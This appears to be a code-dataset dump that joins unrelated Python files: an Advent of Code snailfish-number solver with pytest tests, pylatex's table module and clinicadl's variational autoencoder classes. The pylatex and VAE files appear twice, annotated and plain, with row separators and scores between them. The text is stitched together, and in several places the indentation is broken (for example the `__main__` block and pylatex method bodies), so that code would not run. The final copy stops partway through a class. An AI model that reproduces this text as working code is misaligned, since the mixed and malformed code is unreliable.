            snail_fish_number=child, index_so_far=path + (child_pos,)
        )
        if found:
            return found
    return None
def find_left_neighbor_index(
    snail_fish_number, index: Tuple[int, ...]
) -> Optional[Tuple[int, ...]]:
    """Index of the regular number immediately left of ``index``, or None.

    An all-zero path means the node is leftmost and has no left neighbor.
    """
    if not any(index):
        return None
    # Step up to the deepest right branch, go left once, then descend rightwards
    # until a regular number is reached.
    branch = find_index_of_last_value(index, 1)
    neighbor = index[:branch] + (0,)
    while is_tuple_at_location(snail_fish_number, neighbor):
        neighbor = neighbor + (1,)
    return neighbor
def is_tuple_at_location(snail_fish_number, index: Tuple[int, ...]):
    """Return True when ``index`` addresses a pair rather than a regular number."""
    located = get_value_at_index(snail_fish_number=snail_fish_number, index=index)
    return isinstance(located, tuple)
def get_value_at_index(snail_fish_number, index):
    """Follow the 0/1 choices in ``index`` down the nested tuples."""
    node = snail_fish_number
    for branch in index:
        node = node[branch]
    return node
def find_index_of_last_value(tt: Tuple[int, ...], target_value):
    """Return the largest position where ``target_value`` occurs in ``tt``, else None."""
    for position in range(len(tt) - 1, -1, -1):
        if tt[position] == target_value:
            return position
    return None
# Cases cover: leftmost pair (no neighbor), sibling lookups, and descending
# through nested pairs to find the nearest regular number on the left.
@pytest.mark.parametrize(
    "snail_fish_number, index, expected",
    [
        ((((((1, 2), 3), 4), 5), 6), (0, 0, 0, 0), None),
        ((1, (2, (3, (4, (5, 6))))), (1, 1, 1, 1), (1, 1, 1, 0)),
        ((1, (2, (3, ((4, 5), 6)))), (1, 1, 1, 0), (1, 1, 0)),
        ((1, (2, ((3, 4), ((4, 5), 6)))), (1, 1, 1, 0), (1, 1, 0, 1)),
        (((1, (2, (3, 4))), ((((10, 9), 8), 7), 6)), (1, 0, 0, 0), (0, 1, 1, 1)),
    ],
)
def test_find_left_neighbor_index(snail_fish_number, index, expected):
    """The nearest regular number to the left is located (or None)."""
    assert (
        find_left_neighbor_index(snail_fish_number=snail_fish_number, index=index)
        == expected
    )
def find_right_neighbor_index(snail_fish_number, index: Tuple[int, ...]):
    """Index of the regular number immediately right of ``index``, or None.

    An all-one path means the node is rightmost and has no right neighbor.
    """
    if all(index):
        return None
    # Step up to the deepest left branch, go right once, then descend leftwards
    # until a regular number is reached.
    branch = find_index_of_last_value(index, 0)
    neighbor = index[:branch] + (1,)
    while is_tuple_at_location(snail_fish_number, neighbor):
        neighbor = neighbor + (0,)
    return neighbor
# Cases: the rightmost leaf has no right neighbour (None); otherwise the path
# of the nearest regular number to the right is expected.
@pytest.mark.parametrize(
    "snail_fish_number, index, expected",
    [
        ((((((1, 2), 3), 4), 5), 6), (0, 0, 0, 0), (0, 0, 0, 1)),
        ((1, (2, (3, (4, (5, 6))))), (1, 1, 1, 1), None),
        ((1, (2, (3, ((4, 5), 6)))), (1, 1, 1, 0), (1, 1, 1, 1)),
        ((1, (2, ((3, 4), ((4, 5), 6)))), (1, 1, 1, 0), (1, 1, 1, 1)),
        (((1, (2, (3, 4))), ((((10, 9), 8), 7), 6)), (1, 0, 0, 0), (1, 0, 0, 1)),
    ],
)
def test_find_right_neighbor_index(snail_fish_number, index, expected):
    assert (
        find_right_neighbor_index(snail_fish_number=snail_fish_number, index=index)
        == expected
    )
class ExplodeReplaceCommand:
    """Rebuild a snailfish number with one explosion applied.

    The exploding pair (described by *spec*) is replaced by 0, its left value
    is added to the nearest regular number on its left (if any) and its right
    value to the nearest regular number on its right.
    """

    def __init__(self, spec: ExplosionSpec, snail_fish_number):
        self.snail_fish_number = snail_fish_number
        self.explosion_spec = spec
        # Paths of the regular numbers that absorb the exploded values;
        # either may be None at the edges of the number.
        self.left_index = find_left_neighbor_index(
            snail_fish_number=snail_fish_number, index=spec.index
        )
        self.right_index = find_right_neighbor_index(
            snail_fish_number=snail_fish_number, index=spec.index
        )

    def get_value(self, index: Tuple[int, ...]) -> Union[Tuple, int]:
        """Value of the rebuilt number at *index* (recursive tree copy).

        The explosion-index check must come before ``get_value_at_index``:
        at that path the stored value is still the exploding pair, and it has
        to collapse to 0 rather than be descended into.
        """
        if index == self.explosion_spec.index:
            return 0
        value_at_index = get_value_at_index(
            snail_fish_number=self.snail_fish_number, index=index
        )
        if index == self.left_index:
            return value_at_index + self.explosion_spec.left_value
        if index == self.right_index:
            return value_at_index + self.explosion_spec.right_value
        if isinstance(value_at_index, int):
            return value_at_index
        # Pair node: rebuild it by recursing into each child position.
        return tuple(self.get_value(index + (i,)) for i in range(len(value_at_index)))
def explode(snail_fish_number, index_so_far: Tuple[int, ...] = None):
    """Apply the first (leftmost, depth-4) explosion and return the result.

    Returns the number unchanged when nothing explodes. ``index_so_far`` is
    unused and kept only for backward compatibility with existing callers.
    """
    spec = find_first_explosion(snail_fish_number)
    if not spec:
        return snail_fish_number
    command = ExplodeReplaceCommand(spec=spec, snail_fish_number=snail_fish_number)
    return command.get_value(tuple())
# Explosion examples; the last two show left/right values being absorbed by
# neighbouring regular numbers across the top-level pair.
@pytest.mark.parametrize(
    "snail_fish_number, expected",
    [
        (((((0, 1), 2), 3), 4), ((((0, 1), 2), 3), 4)),
        ((((((9, 8), 1), 2), 3), 4), ((((0, 9), 2), 3), 4)),
        ((7, (6, (5, (4, (3, 2))))), (7, (6, (5, (7, 0))))),
        (((6, (5, (4, (3, 2)))), 1), ((6, (5, (7, 0))), 3)),
        (
            ((3, (2, (1, (7, 3)))), (6, (5, (4, (3, 2))))),
            ((3, (2, (8, 0))), (9, (5, (4, (3, 2))))),
        ),
        (
            ((3, (2, (8, 0))), (9, (5, (4, (3, 2))))),
            ((3, (2, (8, 0))), (9, (5, (7, 0)))),
        ),
    ],
)
def test_explode(snail_fish_number, expected):
    assert explode(snail_fish_number) == expected
class SplitSfnCommand:
    """Apply at most one "split" to a snailfish number.

    A regular number >= 10 splits into a pair (floor(n/2), ceil(n/2)). The
    command is stateful on purpose: ``split_count`` guarantees only the first
    (leftmost) candidate is split per pass, so use a fresh instance per pass.
    """

    def __init__(self):
        # Number of splits performed so far; only the first one is applied.
        self.split_count = 0

    def split(self, snail_fish_number):
        """Return *snail_fish_number* with the leftmost eligible split applied."""
        if self.split_count > 0:
            # A split already happened earlier in this pass: copy through.
            return snail_fish_number
        if isinstance(snail_fish_number, int):
            if snail_fish_number >= 10:
                return self.split_number(snail_fish_number)
            return snail_fish_number
        return tuple(self.split(sub_number) for sub_number in snail_fish_number)

    def split_number(self, number):
        """Split *number* into ``(floor(n/2), ceil(n/2))`` and record the split."""
        self.split_count += 1
        # Integer floor division is exact for arbitrarily large ints, unlike
        # the previous math.floor(number / 2.0) which loses precision for
        # values beyond 2**53 (float mantissa limit).
        a = number // 2
        return a, number - a
# Split examples; the last case checks that only the FIRST number >= 10 is
# split in a single pass (12 stays intact).
@pytest.mark.parametrize(
    "snail_fish_number, expected",
    [
        ((1, 2), (1, 2)),
        ((10, 2), ((5, 5), 2)),
        ((11, 2), ((5, 6), 2)),
        ((1, 12), (1, (6, 6))),
        ((1, 13), (1, (6, 7))),
        ((1, (2, 10)), (1, (2, (5, 5)))),
        ((1, (2, (3, 10))), (1, (2, (3, (5, 5))))),
        ((11, 12), ((5, 6), 12)),
    ],
)
def test_split_sfn(snail_fish_number, expected):
    assert SplitSfnCommand().split(snail_fish_number) == expected
def sfn_add(sfn_a, sfn_b):
    """Snailfish addition: pair the two operands (reduction is the caller's job)."""
    return (sfn_a, sfn_b)
# Addition simply nests the operands into a new pair; no reduction here.
@pytest.mark.parametrize(
    "sfn_a, sfn_b, expected",
    [
        ((1, 2), (3, 4), ((1, 2), (3, 4))),
        ((1, (2, (3, 4))), ((5, 6), 7), ((1, (2, (3, 4))), ((5, 6), 7))),
    ],
)
def test_sfn_add(sfn_a, sfn_b, expected):
    assert sfn_add(sfn_a, sfn_b) == expected
def sfn_reduce(sfn):
    """Fully reduce *sfn*: explode to a fixpoint, split once, repeat until stable."""
    while True:
        exploded = explode(sfn)
        if exploded != sfn:
            # An explosion changed the number: keep exploding before splitting.
            sfn = exploded
            continue
        # No explosion possible: perform at most one split.
        after_split = SplitSfnCommand().split(sfn)
        if after_split == sfn:
            return sfn
        sfn = after_split
# End-to-end reduction: mixes explode-only, split-only and combined cases.
@pytest.mark.parametrize(
    "sfn, expected",
    [
        ((1, 2), (1, 2)),
        ((((((9, 8), 1), 2), 3), 4), ((((0, 9), 2), 3), 4)),
        (
            ((3, (2, (1, (7, 3)))), (6, (5, (4, (3, 2))))),
            ((3, (2, (8, 0))), (9, (5, (7, 0)))),
        ),
        ((1, 13), (1, (6, 7))),
        ((12, 13), ((6, 6), (6, 7))),
        (
            (((((4, 3), 4), 4), (7, ((8, 4), 9))), (1, 1)),
            ((((0, 7), 4), ((7, 8), (6, 0))), (8, 1)),
        ),
    ],
)
def test_sfn_reduce(sfn, expected):
    assert sfn_reduce(sfn) == expected
def add_and_reduce_many_sfns(sfns: List[Tuple]):
    """Left-fold the numbers: add each one to the running total, reducing after each add."""
    numbers = iter(sfns)
    total = next(numbers)
    for sfn in numbers:
        total = sfn_reduce(sfn_add(total, sfn))
    return total
# Larger fold over ten numbers (Advent-of-Code style worked example).
def test_add_and_reduce_many_sfns():
    assert add_and_reduce_many_sfns(
        [
            (((0, (4, 5)), (0, 0)), (((4, 5), (2, 6)), (9, 5))),
            (7, (((3, 7), (4, 3)), ((6, 3), (8, 8)))),
            ((2, ((0, 8), (3, 4))), (((6, 7), 1), (7, (1, 6)))),
            ((((2, 4), 7), (6, (0, 5))), (((6, 8), (2, 8)), ((2, 1), (4, 5)))),
            (7, (5, ((3, 8), (1, 4)))),
            ((2, (2, 2)), (8, (8, 1))),
            (2, 9),
            (1, (((9, 3), 9), ((9, 0), (0, 7)))),
            (((5, (7, 4)), 7), 1),
            ((((4, 2), 2), 6), (8, 7)),
        ]
    ) == (
        (((8, 7), (7, 7)), ((8, 6), (7, 7))),
        (((0, 7), (6, 6)), (8, 7)),
    )
def sfn_magnitude(sfn):
    """Magnitude of a snailfish number: 3*left + 2*right, recursively; an int is itself."""
    if isinstance(sfn, tuple):
        left, right = sfn
        return 3 * sfn_magnitude(left) + 2 * sfn_magnitude(right)
    return sfn
# Magnitude weights: 3x the left element, 2x the right, applied recursively.
@pytest.mark.parametrize(
    "sfn, expected",
    [
        ((1, 2), 7),
        ((9, 1), 29),
        (((1, 2), ((3, 4), 5)), 143),
        (((((8, 7), (7, 7)), ((8, 6), (7, 7))), (((0, 7), (6, 6)), (8, 7))), 3488),
    ],
)
def test_sfn_magnitude(sfn, expected):
    assert sfn_magnitude(sfn) == expected
def do_homework(sfns):
    """Sum all numbers (reducing along the way) and return the final magnitude."""
    total = add_and_reduce_many_sfns(sfns)
    return sfn_magnitude(total)
# Worked-example input shared by the part-1 and part-2 tests below.
EXAMPLE_HOMEWORK = [
    (((0, (5, 8)), ((1, 7), (9, 6))), ((4, (1, 2)), ((1, 4), 2))),
    (((5, (2, 8)), 4), (5, ((9, 9), 0))),
    (6, (((6, 2), (5, 6)), ((7, 6), (4, 7)))),
    (((6, (0, 7)), (0, 9)), (4, (9, (9, 0)))),
    (((7, (6, 4)), (3, (1, 3))), (((5, 5), 1), 9)),
    ((6, ((7, 3), (3, 2))), (((3, 8), (5, 7)), 4)),
    ((((5, 4), (7, 7)), 8), ((8, 3), 8)),
    ((9, 3), ((9, 9), (6, (4, 9)))),
    ((2, ((7, 7), 7)), ((5, 8), ((9, 3), (0, 2)))),
    ((((5, 2), 5), (8, (3, 7))), ((5, (7, 5)), (4, 4))),
]
# Part 1: magnitude of the full sum of the example input.
def test_do_homework():
    assert do_homework(EXAMPLE_HOMEWORK) == 4140
def do_homework_part_2(sfns):
    """Largest magnitude obtainable by adding any ordered pair of distinct numbers."""
    # Ordered pairs matter: snailfish addition is not commutative.
    return max(
        (do_homework(pair) for pair in get_all_pairs(sfns)),
        default=0,
    )
def get_all_pairs(sfns):
    """Yield every ordered pair ``[a, b]`` of elements at distinct positions."""
    for i, first in enumerate(sfns):
        for j, second in enumerate(sfns):
            if i != j:
                yield [first, second]
# Part 2: best magnitude over all ordered pairs of the example input.
def test_do_homework_part_2():
    assert do_homework_part_2(EXAMPLE_HOMEWORK) == 3993
def part_a(filepath: str):
    """Solve part A: magnitude of the sum of all numbers in the input file."""
    with open(filepath, "r") as file:
        contents = file.read()
    return do_homework(parse_input(contents))
def part_b(filepath: str):
    """Solve part B: best pairwise-sum magnitude over the input file's numbers."""
    with open(filepath, "r") as file:
        contents = file.read()
    return do_homework_part_2(parse_input(contents))
if __name__ == "__main__":
day = 18
input_file = f"../puzzle_input/day{day}.txt"
print(f"The answer to {day}A is: {part_a(input_file)}")
print(f"The answer to {day}B is: {part_b(input_file)}") | 0.736021 | 0.688516 |
from . import LatexObject, Environment, Command
from ..utils import dumps_list
from ..package import Package
from collections import Counter
import re
def _get_table_width(table_spec):
"""Calculate the width of a table based on its spec.
:param table_spec:
:type table_spec: str
:return:
:rtype: int
"""
column_letters = ['l', 'c', 'r', 'p', 'm', 'b']
# Remove things like {\bfseries}
cleaner_spec = re.sub(r'{[^}]*}', '', table_spec)
spec_counter = Counter(cleaner_spec)
return sum(spec_counter[l] for l in column_letters)
class TabularBase(Environment):
    """A class that is used as a base for all table classes.

    :param table_spec: LaTeX column specification, e.g. ``'l|c|r'``
    :param data: initial content passed to the environment
    :param pos: positioning options for the environment
    :type table_spec: str
    :type data: list
    :type pos: list
    """

    def __init__(self, table_spec, data=None, pos=None, **kwargs):
        # Column count derived from the spec; used by add_hline/add_empty_row.
        self.width = _get_table_width(table_spec)
        super().__init__(data=data, options=pos,
                         arguments=table_spec, **kwargs)
def add_hline(self, start=None, end=None):
"""Add a horizontal line to the table.
:param start:
:param end:
:type start: int
:type end: int
"""
if start is None and end is None:
self.append(r'\hline')
else:
if start is None:
start = 1
elif end is None:
end = self.width
self.append(Command('cline', str(start) + '-' + str(end)))
def add_empty_row(self):
"""Add an empty row to the table."""
self.append((self.width - 1) * '&' + r'\\')
def add_row(self, cells, escape=False, mapper=None):
"""Add a row of cells to the table.
:param cells:
:param escape:
:type cells: tuple
:type escape: bool
"""
# Propegate packages used in cells
for c in cells:
if isinstance(c, LatexObject):
for p in c.packages:
self.packages.add(p)
self.append(dumps_list(cells, escape=escape, token='&', mapper=mapper)
+ r'\\')
def add_multicolumn(self, size, align, content, cells=None, escape=False):
"""Add a multicolumn of width size to the table, with cell content.
:param size:
:param align:
:param content:
:param cells:
:param escape:
:type size: int
:type align: str
:type content: str
:type cells: tuple
:type escape: bool
"""
self.append(Command('multicolumn', arguments=(size, align, content)))
if cells is not None:
self.add_row(cells)
else:
self.append(r'\\')
    def add_multirow(self, size, align, content, hlines=True, cells=None,
                     escape=False):
        """Add a multirow of height size to the table, with cell content.

        :param size: number of rows the cell spans
        :param align: alignment of the multirow cell
        :param content: content of the multirow cell
        :param hlines: add partial hlines between the spanned rows
        :param cells: rows of cells placed next to the multirow, if any
        :param escape: NOTE(review): accepted but never used in this body —
            confirm whether it should be forwarded to ``add_row``.
        :type size: int
        :type align: str
        :type content: str
        :type hlines: bool
        :type cells: tuple
        :type escape: bool
        """
        self.append(Command('multirow', arguments=(size, align, content)))
        # The LaTeX multirow package is required for \multirow.
        self.packages.add(Package('multirow'))
        if cells is not None:
            for i, row in enumerate(cells):
                if hlines and i:
                    # Partial line from column 2 keeps the multirow cell open.
                    self.add_hline(2)
                # Leading '&' skips the column occupied by the multirow cell.
                self.append('&')
                self.add_row(row)
        else:
            # No accompanying cells: pad the spanned rows with empty ones.
            for i in range(size):
self.add_empty_row() | pylatex/base_classes/table.py | from . import LatexObject, Environment, Command
from ..utils import dumps_list
from ..package import Package
from collections import Counter
import re
def _get_table_width(table_spec):
"""Calculate the width of a table based on its spec.
:param table_spec:
:type table_spec: str
:return:
:rtype: int
"""
column_letters = ['l', 'c', 'r', 'p', 'm', 'b']
# Remove things like {\bfseries}
cleaner_spec = re.sub(r'{[^}]*}', '', table_spec)
spec_counter = Counter(cleaner_spec)
return sum(spec_counter[l] for l in column_letters)
class TabularBase(Environment):
"""A class that is used as a base for all table classes.
:param table_spec:
:param data:
:param pos:
:type table_spec: str
:type data: list
:type pos: list
"""
def __init__(self, table_spec, data=None, pos=None, **kwargs):
self.width = _get_table_width(table_spec)
super().__init__(data=data, options=pos,
arguments=table_spec, **kwargs)
def add_hline(self, start=None, end=None):
"""Add a horizontal line to the table.
:param start:
:param end:
:type start: int
:type end: int
"""
if start is None and end is None:
self.append(r'\hline')
else:
if start is None:
start = 1
elif end is None:
end = self.width
self.append(Command('cline', str(start) + '-' + str(end)))
def add_empty_row(self):
"""Add an empty row to the table."""
self.append((self.width - 1) * '&' + r'\\')
def add_row(self, cells, escape=False, mapper=None):
"""Add a row of cells to the table.
:param cells:
:param escape:
:type cells: tuple
:type escape: bool
"""
# Propegate packages used in cells
for c in cells:
if isinstance(c, LatexObject):
for p in c.packages:
self.packages.add(p)
self.append(dumps_list(cells, escape=escape, token='&', mapper=mapper)
+ r'\\')
def add_multicolumn(self, size, align, content, cells=None, escape=False):
"""Add a multicolumn of width size to the table, with cell content.
:param size:
:param align:
:param content:
:param cells:
:param escape:
:type size: int
:type align: str
:type content: str
:type cells: tuple
:type escape: bool
"""
self.append(Command('multicolumn', arguments=(size, align, content)))
if cells is not None:
self.add_row(cells)
else:
self.append(r'\\')
def add_multirow(self, size, align, content, hlines=True, cells=None,
escape=False):
"""Add a multirow of height size to the table, with cell content.
:param size:
:param align:
:param content:
:param hlines:
:param cells:
:param escape:
:type size: int
:type align: str
:type content: str
:type hlines: bool
:type cells: tuple
:type escape: bool
"""
self.append(Command('multirow', arguments=(size, align, content)))
self.packages.add(Package('multirow'))
if cells is not None:
for i, row in enumerate(cells):
if hlines and i:
self.add_hline(2)
self.append('&')
self.add_row(row)
else:
for i in range(size):
self.add_empty_row() | 0.748904 | 0.474996 |
import torch
from torch import nn
from clinicadl.utils.network.vae.base_vae import BaseVAE
from clinicadl.utils.network.vae.vae_utils import (
DecoderLayer3D,
EncoderLayer3D,
Flatten,
Unflatten3D,
VAE_Decoder,
VAE_Encoder,
)
class VanillaDenseVAE(BaseVAE):
    """VAE with a dense (fully connected) latent space.

    Builds a convolutional encoder/decoder pair plus linear mean/variance
    heads, then delegates all training logic to :class:`BaseVAE`.
    """

    def __init__(
        self,
        input_size,
        latent_space_size,
        feature_size,
        recons_weight,
        KL_weight,
        gpu=True,
    ):
        # Fixed architecture hyper-parameters for this vanilla variant.
        n_conv = 4
        io_layer_channel = 32
        encoder = VAE_Encoder(
            input_shape=input_size,
            feature_size=feature_size,
            latent_dim=1,  # latent_dim=1 -> flat feature vector for dense heads
            n_conv=n_conv,
            first_layer_channels=io_layer_channel,
        )
        # Linear heads mapping encoder features to latent mean / variance.
        mu_layer = nn.Linear(feature_size, latent_space_size)
        var_layer = nn.Linear(feature_size, latent_space_size)
        decoder = VAE_Decoder(
            input_shape=input_size,
            latent_size=latent_space_size,
            feature_size=feature_size,
            latent_dim=1,
            n_conv=n_conv,
            last_layer_channels=io_layer_channel,
            # Mirror the encoder's padding so output size matches the input.
            padding=encoder.decoder_padding,
        )
        super(VanillaDenseVAE, self).__init__(
            encoder,
            decoder,
            mu_layer,
            var_layer,
            latent_space_size,
            gpu=gpu,
            recons_weight=recons_weight,
            KL_weight=KL_weight,
            is_3D=False,
        )
class VanillaSpatialVAE(BaseVAE):
    """VAE with a spatial (convolutional) latent space.

    The mean/variance heads are 2D convolutions, so the latent code keeps a
    spatial layout instead of being flattened.
    """

    def __init__(
        self,
        input_size,
        latent_space_size,
        feature_size,
        recons_weight,
        KL_weight,
        gpu=True,
    ):
        # NOTE(review): feature_size and latent_space_size parameters are not
        # used to size the layers below (fixed channel counts are used) —
        # confirm this is intentional.
        feature_channels = 64
        latent_channels = 1
        n_conv = 4
        io_layer_channel = 32
        encoder = VAE_Encoder(
            input_shape=input_size,
            feature_size=feature_channels,
            latent_dim=2,  # latent_dim=2 -> spatial (H x W) latent maps
            n_conv=n_conv,
            first_layer_channels=io_layer_channel,
        )
        # Convolutional heads preserve the spatial layout of the latent code.
        mu_layer = nn.Conv2d(
            feature_channels, latent_channels, 3, stride=1, padding=1, bias=False
        )
        var_layer = nn.Conv2d(
            feature_channels, latent_channels, 3, stride=1, padding=1, bias=False
        )
        decoder = VAE_Decoder(
            input_shape=input_size,
            latent_size=latent_channels,
            feature_size=feature_channels,
            latent_dim=2,
            n_conv=n_conv,
            last_layer_channels=io_layer_channel,
            padding=encoder.decoder_padding,
        )
        super(VanillaSpatialVAE, self).__init__(
            encoder,
            decoder,
            mu_layer,
            var_layer,
            latent_space_size,
            gpu=gpu,
            recons_weight=recons_weight,
            KL_weight=KL_weight,
            is_3D=False,
        )
class Vanilla3DVAE(BaseVAE):
    """VAE over 3D volumes with a spatial (Conv3d) latent space.

    Encoder/decoder are built inline from EncoderLayer3D/DecoderLayer3D
    stacks; hard-coded output paddings compensate for odd input dimensions.
    """

    def __init__(
        self,
        input_size,
        latent_space_size,
        feature_size,
        recons_weight,
        KL_weight,
        gpu=True,
    ):
        # NOTE(review): feature_size is accepted but unused here — confirm.
        n_conv = 4
        first_layer_channels = 32
        last_layer_channels = 32
        feature_channels = 512
        latent_channels = 1
        # Hand-tuned output paddings for the transposed convolutions
        # (indexed from the end via decoder_output_padding[-i] below).
        decoder_output_padding = [
            [1, 0, 0],
            [0, 0, 0],
            [0, 0, 1],
        ]
        input_c = input_size[0]
        # input_h = input_size[1]
        # input_w = input_size[2]
        # Encoder
        encoder_layers = []
        # Input Layer
        encoder_layers.append(EncoderLayer3D(input_c, first_layer_channels))
        # Conv Layers: channel count doubles at each stage.
        for i in range(n_conv - 1):
            encoder_layers.append(
                EncoderLayer3D(
                    first_layer_channels * 2**i, first_layer_channels * 2 ** (i + 1)
                )
            )
        # Final stride-2 projection to the feature channel count.
        encoder_layers.append(
            nn.Sequential(
                nn.Conv3d(
                    first_layer_channels * 2 ** (n_conv - 1),
                    feature_channels,
                    4,
                    stride=2,
                    padding=1,
                    bias=False,
                ),
                nn.ReLU(),
            )
        )
        encoder = nn.Sequential(*encoder_layers)
        # Latent space: convolutional mean / variance heads keep spatiality.
        mu_layer = nn.Conv3d(
            feature_channels, latent_channels, 3, stride=1, padding=1, bias=False
        )
        var_layer = nn.Conv3d(
            feature_channels, latent_channels, 3, stride=1, padding=1, bias=False
        )
        # Decoder: mirror of the encoder built from transposed convolutions.
        decoder_layers = []
        decoder_layers.append(
            nn.Sequential(
                nn.ConvTranspose3d(
                    latent_channels,
                    feature_channels,
                    3,
                    stride=1,
                    padding=1,
                    bias=False,
                ),
                nn.ReLU(),
                nn.ConvTranspose3d(
                    feature_channels,
                    last_layer_channels * 2 ** (n_conv - 1),
                    4,
                    stride=2,
                    padding=1,
                    output_padding=[0, 1, 1],
                    bias=False,
                ),
                nn.ReLU(),
            )
        )
        for i in range(n_conv - 1, 0, -1):
            decoder_layers.append(
                DecoderLayer3D(
                    last_layer_channels * 2 ** (i),
                    last_layer_channels * 2 ** (i - 1),
                    output_padding=decoder_output_padding[-i],
                )
            )
        # Output layer maps back to the input channel count; Sigmoid bounds
        # reconstructions to [0, 1].
        decoder_layers.append(
            nn.Sequential(
                nn.ConvTranspose3d(
                    last_layer_channels,
                    input_c,
                    4,
                    stride=2,
                    padding=1,
                    output_padding=[1, 0, 1],
                    bias=False,
                ),
                nn.Sigmoid(),
            )
        )
        decoder = nn.Sequential(*decoder_layers)
        super(Vanilla3DVAE, self).__init__(
            encoder,
            decoder,
            mu_layer,
            var_layer,
            latent_space_size,
            gpu=gpu,
            recons_weight=recons_weight,
            KL_weight=KL_weight,
            # NOTE(review): is_3D=False despite 3D convolutions — confirm
            # against BaseVAE's is_3D semantics.
            is_3D=False,
        )
class Vanilla3DdenseVAE(BaseVAE):
    """VAE over 3D volumes with a dense (flattened + linear) latent space.

    Unlike Vanilla3DVAE, decoder output paddings are computed automatically
    from the input dimensions, so arbitrary volume sizes are supported.
    """

    def __init__(
        self,
        input_size,
        latent_space_size=256,
        feature_size=1024,
        n_conv=4,
        io_layer_channels=8,
        recons_weight=1,
        KL_weight=1,
        gpu=True,
    ):
        first_layer_channels = io_layer_channels
        last_layer_channels = io_layer_channels
        # automatically compute padding
        decoder_output_padding = [
            # [1, 0, 0],
            # [0, 0, 0],
            # [0, 0, 1],
        ]
        input_c = input_size[0]
        input_d = input_size[1]
        input_h = input_size[2]
        input_w = input_size[3]
        d, h, w = input_d, input_h, input_w
        # ENCODER
        encoder_layers = []
        # Input Layer
        encoder_layers.append(EncoderLayer3D(input_c, first_layer_channels))
        # Parity of each dimension decides the matching decoder output padding.
        decoder_output_padding.append([d % 2, h % 2, w % 2])
        d, h, w = d // 2, h // 2, w // 2
        # Conv Layers: channel count doubles while spatial size halves.
        for i in range(n_conv - 1):
            encoder_layers.append(
                EncoderLayer3D(
                    first_layer_channels * 2**i, first_layer_channels * 2 ** (i + 1)
                )
            )
            # Construct output paddings
            decoder_output_padding.append([d % 2, h % 2, w % 2])
            d, h, w = d // 2, h // 2, w // 2
        # Flattened size of the final encoder feature map.
        n_pix = (
            first_layer_channels
            * 2 ** (n_conv - 1)
            * (input_d // (2**n_conv))
            * (input_h // (2**n_conv))
            * (input_w // (2**n_conv))
        )
        # Flatten
        encoder_layers.append(Flatten())
        # Intermediate feature space; feature_size == 0 keeps the raw width.
        if feature_size == 0:
            feature_space = n_pix
        else:
            feature_space = feature_size
        encoder_layers.append(
            nn.Sequential(nn.Linear(n_pix, feature_space), nn.ReLU())
        )
        encoder = nn.Sequential(*encoder_layers)
        # LATENT SPACE: linear mean / variance heads on the flat features.
        mu_layer = nn.Linear(feature_space, latent_space_size)
        var_layer = nn.Linear(feature_space, latent_space_size)
        # DECODER
        decoder_layers = []
        # Intermediate feature space (mirrors the encoder's dense stage).
        if feature_size == 0:
            decoder_layers.append(
                nn.Sequential(
                    nn.Linear(latent_space_size, n_pix),
                    nn.ReLU(),
                )
            )
        else:
            decoder_layers.append(
                nn.Sequential(
                    nn.Linear(latent_space_size, feature_size),
                    nn.ReLU(),
                    nn.Linear(feature_size, n_pix),
                    nn.ReLU(),
                )
            )
        # Unflatten back to the final encoder feature-map shape.
        decoder_layers.append(
            Unflatten3D(
                last_layer_channels * 2 ** (n_conv - 1),
                input_d // (2**n_conv),
                input_h // (2**n_conv),
                input_w // (2**n_conv),
            )
        )
        # Decoder layers, consuming the recorded output paddings in reverse.
        for i in range(n_conv - 1, 0, -1):
            decoder_layers.append(
                DecoderLayer3D(
                    last_layer_channels * 2 ** (i),
                    last_layer_channels * 2 ** (i - 1),
                    output_padding=decoder_output_padding[i],
                )
            )
        # Output layer; Sigmoid bounds reconstructions to [0, 1].
        decoder_layers.append(
            nn.Sequential(
                nn.ConvTranspose3d(
                    last_layer_channels,
                    input_c,
                    4,
                    stride=2,
                    padding=1,
                    output_padding=decoder_output_padding[0],
                    bias=False,
                ),
                nn.Sigmoid(),
            )
        )
        decoder = nn.Sequential(*decoder_layers)
        super(Vanilla3DdenseVAE, self).__init__(
            encoder,
            decoder,
            mu_layer,
            var_layer,
            latent_space_size,
            gpu=gpu,
            # NOTE(review): is_3D=False despite 3D convolutions — confirm.
            is_3D=False,
            recons_weight=recons_weight,
            KL_weight=KL_weight,
) | clinicadl/utils/network/vae/vanilla_vae.py | import torch
from torch import nn
from clinicadl.utils.network.vae.base_vae import BaseVAE
from clinicadl.utils.network.vae.vae_utils import (
DecoderLayer3D,
EncoderLayer3D,
Flatten,
Unflatten3D,
VAE_Decoder,
VAE_Encoder,
)
class VanillaDenseVAE(BaseVAE):
def __init__(
self,
input_size,
latent_space_size,
feature_size,
recons_weight,
KL_weight,
gpu=True,
):
n_conv = 4
io_layer_channel = 32
encoder = VAE_Encoder(
input_shape=input_size,
feature_size=feature_size,
latent_dim=1,
n_conv=n_conv,
first_layer_channels=io_layer_channel,
)
mu_layer = nn.Linear(feature_size, latent_space_size)
var_layer = nn.Linear(feature_size, latent_space_size)
decoder = VAE_Decoder(
input_shape=input_size,
latent_size=latent_space_size,
feature_size=feature_size,
latent_dim=1,
n_conv=n_conv,
last_layer_channels=io_layer_channel,
padding=encoder.decoder_padding,
)
super(VanillaDenseVAE, self).__init__(
encoder,
decoder,
mu_layer,
var_layer,
latent_space_size,
gpu=gpu,
recons_weight=recons_weight,
KL_weight=KL_weight,
is_3D=False,
)
class VanillaSpatialVAE(BaseVAE):
def __init__(
self,
input_size,
latent_space_size,
feature_size,
recons_weight,
KL_weight,
gpu=True,
):
feature_channels = 64
latent_channels = 1
n_conv = 4
io_layer_channel = 32
encoder = VAE_Encoder(
input_shape=input_size,
feature_size=feature_channels,
latent_dim=2,
n_conv=n_conv,
first_layer_channels=io_layer_channel,
)
mu_layer = nn.Conv2d(
feature_channels, latent_channels, 3, stride=1, padding=1, bias=False
)
var_layer = nn.Conv2d(
feature_channels, latent_channels, 3, stride=1, padding=1, bias=False
)
decoder = VAE_Decoder(
input_shape=input_size,
latent_size=latent_channels,
feature_size=feature_channels,
latent_dim=2,
n_conv=n_conv,
last_layer_channels=io_layer_channel,
padding=encoder.decoder_padding,
)
super(VanillaSpatialVAE, self).__init__(
encoder,
decoder,
mu_layer,
var_layer,
latent_space_size,
gpu=gpu,
recons_weight=recons_weight,
KL_weight=KL_weight,
is_3D=False,
)
class Vanilla3DVAE(BaseVAE):
def __init__(
self,
input_size,
latent_space_size,
feature_size,
recons_weight,
KL_weight,
gpu=True,
):
n_conv = 4
first_layer_channels = 32
last_layer_channels = 32
feature_channels = 512
latent_channels = 1
decoder_output_padding = [
[1, 0, 0],
[0, 0, 0],
[0, 0, 1],
]
input_c = input_size[0]
# input_h = input_size[1]
